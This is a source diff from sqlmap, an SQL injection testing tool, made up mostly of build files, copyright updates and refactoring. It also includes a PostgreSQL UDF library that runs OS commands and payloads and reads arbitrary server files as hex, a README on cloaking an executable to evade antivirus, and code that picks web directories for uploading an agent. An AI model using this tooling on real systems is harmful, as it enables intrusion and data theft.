+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_mysqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif
 
 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }
 
 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}
 
 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));
 
 	PG_RETURN_POINTER(result_text);
 }
 
 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj

@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_postgresqludf_sys"
+	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
+	RootNamespace="lib_postgresqludf_sys"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="false"
+				SubSystem="0"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_postgresqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

lib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/multipartpost.py

@@ -54,7 +54,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
             
             try:
                 for(key, value) in data.items():
-                    if type(value) == file:
+                    if type(value) == file or hasattr(value, 'file'):
                         v_files.append((key, value))
                     else:
                         v_vars.append((key, value))

lib/contrib/upx/windows/README.txt

@@ -0,0 +1,11 @@
+Due to the anti-virus positive detection of executable stored inside this
+folder,  we needed to somehow circumvent this. As from the plain sqlmap
+users perspective nothing has to be done prior to its usage by sqlmap, but
+if you want to have access to the original executable use the decrypt
+functionality of the ../../../../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../../../../extra/cloak/cloak.py -i upx.exe
+
+To get back the original executable use this:
+python ../../../../extra/cloak/cloak.py -d -i upx.exe_

lib/controller/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/controller/action.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/controller/checks.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -33,6 +33,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapNoneDataException
 from lib.core.session import setString
 from lib.core.session import setRegexp
 from lib.request.connect import Connect as Request
@@ -293,13 +294,19 @@ def checkStability():
     time.sleep(1)
     secondPage, _ = Request.queryPage(content=True)
 
-    condition = firstPage == secondPage
+    condition = (firstPage == secondPage)
 
     if condition:
-        conf.md5hash = md5hash(firstPage)
-
-        logMsg  = "url is stable"
-        logger.info(logMsg)
+        if firstPage:
+            conf.md5hash = md5hash(firstPage)
+            logMsg  = "url is stable"
+            logger.info(logMsg)
+        else:
+            exceptionMsg   = "there was an error checking the stability of page "
+            exceptionMsg  += "because of lack of content. please check the "
+            exceptionMsg  += "page request results (and probable errors) by "
+            exceptionMsg  += "using higher verbosity levels"
+            raise sqlmapNoneDataException, exceptionMsg
 
     elif not condition:
         warnMsg  = "url is not stable, sqlmap will base the page "
@@ -310,6 +317,7 @@ def checkStability():
         logger.warn(warnMsg)
 
     return condition
+
 def checkString():
     if not conf.string:
         return True

lib/controller/controller.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -30,8 +30,8 @@ from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
 from lib.core.common import paramToDict
+from lib.core.common import parseTargetUrl
 from lib.core.common import readInput
-from lib.core.common import sanitizeCookie
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -134,6 +134,7 @@ def start():
             logMsg = "testing url %s" % targetUrl
             logger.info(logMsg)
 
+        parseTargetUrl()
         createTargetDirs()
         initTargetEnv()
 
@@ -162,10 +163,9 @@ def start():
                         setCookieAsInjectable = False
     
                 if setCookieAsInjectable:
-                    safeCookie = sanitizeCookie(cookieStr)
-                    conf.httpHeaders.append(("Cookie", safeCookie))
-                    conf.parameters["Cookie"] = safeCookie
-                    __paramDict = paramToDict("Cookie", safeCookie)
+                    conf.httpHeaders.append(("Cookie", cookieStr))
+                    conf.parameters["Cookie"] = cookieStr
+                    __paramDict = paramToDict("Cookie", cookieStr)
     
                     if __paramDict:
                         conf.paramDict["Cookie"] = __paramDict

lib/controller/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/agent.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -26,6 +26,7 @@ import re
 
 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import queries
@@ -52,6 +53,7 @@ class Agent:
         falseValue = ""
         negValue   = ""
         retValue   = ""
+        newValue   = urlencode(newValue)
 
         if negative or conf.paramNegative:
             negValue = "-"

lib/core/common.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -32,6 +32,11 @@ import time
 import urlparse
 import ntpath
 import posixpath
+
+from tempfile import NamedTemporaryFile
+from tempfile import mkstemp
+
+from extra.cloak.cloak import decloak
 from lib.contrib import magic
 from lib.core.data import conf
 from lib.core.data import kb
@@ -39,12 +44,16 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.data import queries
 from lib.core.data import temp
+from lib.core.convert import urlencode
 from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapSyntaxException
+from lib.core.settings import DESCRIPTION
 from lib.core.settings import IS_WIN
+from lib.core.settings import SITE
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.settings import VERSION_STRING
 
-
 def paramToDict(place, parameters=None):
     """
     Split the parameters into names and values, check if these parameters
@@ -121,7 +130,7 @@ def formatDBMSfp(versions=None):
     @rtype: C{str}
     """
 
-    if not versions:
+    if not versions or versions == [None]:
         versions = kb.dbmsVersion
 
     if isinstance(versions, str):
@@ -215,31 +224,41 @@ def getHtmlErrorFp():
 
     return htmlParsed
 
-def getDocRoot():
+def getDocRoot(webApi=None):
     docRoot = None
     pagePath = directoryPath(conf.path)
 
     if kb.os == "Windows":
-        defaultDocRoot = "C:/Inetpub/wwwroot/"
+        if webApi == "php":
+            defaultDocRoot = "C:/xampp/htdocs/"
+        else:
+            defaultDocRoot = "C:/Inetpub/wwwroot/"
     else:
         defaultDocRoot = "/var/www/"
 
     if kb.absFilePaths:
         for absFilePath in kb.absFilePaths:
+            if directoryPath(absFilePath) == '/':
+                continue
             absFilePath = normalizePath(absFilePath)
             absFilePathWin = None
 
-            if re.match("[A-Za-z]:(\\[\w.\\]*)?", absFilePath):
-                absFilePathWin = absFilePath
-                absFilePath    = absFilePath[2:].replace("\\", "/")
+            if isWindowsPath(absFilePath):
+                absFilePathWin = posixToNtSlashes(absFilePath)
+                absFilePath    = ntToPosixSlashes(absFilePath[2:])
             
             if pagePath in absFilePath:
                 index   = absFilePath.index(pagePath)
                 docRoot = absFilePath[:index]
 
-                if absFilePathWin:
-                    docRoot = "C:/%s" % docRoot.replace("\\", "/")
+                if len(docRoot) == 0:
+                    docRoot = None
+                    continue
 
+                if absFilePathWin:
+                    docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
+                    
+                docRoot = normalizePath(docRoot)
                 break
 
     if docRoot:
@@ -260,13 +279,16 @@ def getDocRoot():
 
     return docRoot
 
-def getDirs():
+def getDirs(webApi=None):
     directories = set()
 
     if kb.os == "Windows":
-        defaultDir = "C:/Inetpub/wwwroot/test/"
+        if webApi == "php":
+            defaultDirs = ["C:/xampp/htdocs/"]
+        else:
+            defaultDirs = ["C:/Inetpub/wwwroot/"]
     else:
-        defaultDir = "/var/www/test/"
+        defaultDirs = ["/var/www/"]
 
     if kb.absFilePaths:
         infoMsg  = "retrieved web server full paths: "
@@ -275,14 +297,19 @@ def getDirs():
         
         for absFilePath in kb.absFilePaths:
             if absFilePath:
-                directories.add(os.path.dirname(absFilePath))
+                directory = directoryPath(absFilePath)
+                if isWindowsPath(directory):
+                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
+                directories.add(directory)
     else:
         warnMsg = "unable to retrieve any web server path"
         logger.warn(warnMsg)
 
     message   = "please provide any additional web server full path to try "
-    message  += "to upload the agent [%s]: " % defaultDir
-    inputDirs = readInput(message, default=defaultDir)
+    message  += "to upload the agent [%s]: " % ",".join(directory for directory in defaultDirs)
+    inputDirs = readInput(message, default=",".join(directory for directory in defaultDirs))
 
     if inputDirs:
         inputDirs = inputDirs.replace(", ", ",")
@@ -292,7 +319,7 @@ def getDirs():
             if inputDir:
                 directories.add(inputDir)
     else:
-        directories.add(defaultDir)
+        [directories.add(directory) for directory in defaultDirs]
 
     return directories
     
@@ -437,7 +464,7 @@ def randomInt(length=4):
 
     return int("".join([random.choice(string.digits) for _ in xrange(0, length)]))
 
-def randomStr(length=5, lowercase=False):
+def randomStr(length=4, lowercase=False):
     """
     @param length: length of the random string.
     @type length: C{int}
@@ -489,9 +516,9 @@ def banner():
     """
 
     print """
+    %s - %s
     %s
-    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-    """ % VERSION_STRING
+    """ % (VERSION_STRING, DESCRIPTION, SITE)
     
 def parsePasswordHash(password):
     blank = " " * 8
@@ -540,6 +567,7 @@ def setPaths():
     paths.SQLMAP_HISTORY         = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
     paths.SQLMAP_CONFIG          = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.FUZZ_VECTORS           = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
+    paths.DETECTION_RULES_XML    = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
     paths.ERRORS_XML             = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
     paths.QUERIES_XML            = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
     paths.GENERIC_XML            = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
@@ -580,7 +608,11 @@ def parseTargetUrl():
     conf.hostname  = __hostnamePort[0]
 
     if len(__hostnamePort) == 2:
-        conf.port = int(__hostnamePort[1])
+        try:
+            conf.port = int(__hostnamePort[1])
+        except:
+            errMsg = "invalid target url"
+            raise sqlmapSyntaxException, errMsg
     elif conf.scheme == "https":
         conf.port = 443
     else:
@@ -810,46 +842,103 @@ def searchEnvPath(fileName):
 
     return result
 
-def sanitizeCookie(cookieStr, warn=False):
+def urlEncodeCookieValues(cookieStr):
     if cookieStr:
         result = ""
-        changed = False
         for part in cookieStr.split(';'):
             index = part.find('=') + 1
             if index > 0:
                 name = part[:index - 1].strip()
-                value = part[index:].replace(",","%2C").replace(";","%3B").replace(" ","%20")
-                if value != part[index:]:
-                    changed = True
-                result += ";%s=%s" % (name, value)
+                value = urlencode(part[index:], convall=True)
+                result += "; %s=%s" % (name, value)
             elif part.strip().lower() != "secure":
-                result += "%s%s" % ("%3B", part.replace(",","%2C").replace(";","%3B").replace(" ","%20"))
+                result += "%s%s" % ("%3B", urlencode(part, convall=True))
             else:
-                result += ";secure"
-        if result.startswith(';'):
-            result = result[1:]
+                result += "; secure"
+        if result.startswith('; '):
+            result = result[2:]
         elif result.startswith('%3B'):
             result = result[3:]
-        if changed and warn:
-            warnMsg = "cookie is provided in HTTP unsafe format containing one "
-            warnMsg += "of problematic characters: ' ,;'. temporary sanitized."
-            logger.warn(warnMsg)
         return result
     else:
         return None
 
 def directoryPath(path):
     retVal = None
-    if path.find('/') != -1:
-        retVal = posixpath.dirname(path)
-    else:
+    if isWindowsPath(path):
         retVal = ntpath.dirname(path)
+    else:
+        retVal = posixpath.dirname(path)
     return retVal
 
 def normalizePath(path):
+    """
+    This function must be called only after posixToNtSlashes()
+    and ntToPosixSlashes()
+    """
+
     retVal = None
-    if path.find('/') != -1:
-        retVal = posixpath.normpath(path)
-    else:
+
+    if isWindowsPath(path):
         retVal = ntpath.normpath(path)
+    else:
+        retVal = posixpath.normpath(path)
+
     return retVal
+
+def safeStringFormat(formatStr, params):
+    retVal = formatStr.replace('%d', '%s')
+
+    if isinstance(params, str):
+        retVal = retVal.replace("%s", params)
+    else:
+        count = 0
+        index = 0
+
+        while index != -1:
+            index = retVal.find('%s')
+
+            if index != -1:
+                if count < len(params):
+                    retVal = retVal[:index] + str(params[count]) + retVal[index+2:]
+                else:
+                    raise sqlmapNoneDataException, "wrong number of parameters during string formatting"
+                count += 1
+
+    return retVal
+
+def sanitizeAsciiString(string):
+    return "".join(char if ord(char) < 128 else '?' for char in string)
+
+def decloakToNamedTemporaryFile(filepath, name=None):
+    retVal = NamedTemporaryFile()
+    def __del__():
+        try:
+            if hasattr(retVal, 'old_name'):
+                retVal.name = old_name
+            retVal.close()
+        except OSError:
+            pass
+    retVal.__del__ = __del__
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    if name:
+        retVal.old_name = retVal.name
+        retVal.name = name
+    return retVal
+
+def decloakToMkstemp(filepath, **kwargs):
+    name = mkstemp(**kwargs)[1]
+    retVal = open(name, 'w+b')
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    return retVal
+
+def isWindowsPath(filepath):
+    return re.search("\A[\w]\:\\\\", filepath) is not None
+
+def posixToNtSlashes(filepath):
+    return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+    return filepath.replace('\\', '/')

lib/core/convert.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-import md5
-import sha
+try:
+    import hashlib
+except:
+    import md5
+    import sha
+    
+import sys
 import struct
 import urllib
 
@@ -45,7 +50,10 @@ def hexencode(string):
     return string.encode("hex")
 
 def md5hash(string):
-    return md5.new(string).hexdigest()
+    if sys.modules.has_key('hashlib'):
+        return hashlib.md5(string).hexdigest()
+    else:
+        return md5.new(string).hexdigest()
 
 def orddecode(string):
     packedString = struct.pack("!"+"I" * len(string), *string)
@@ -55,7 +63,10 @@ def ordencode(string):
     return tuple([ord(char) for char in string])
 
 def sha1hash(string):
-    return sha.new(string).hexdigest()
+    if sys.modules.has_key('hashlib'):
+        return hashlib.sha1(string).hexdigest()
+    else:
+        return sha.new(string).hexdigest()
 
 def urldecode(string):
     result = None

lib/core/data.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/datatype.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
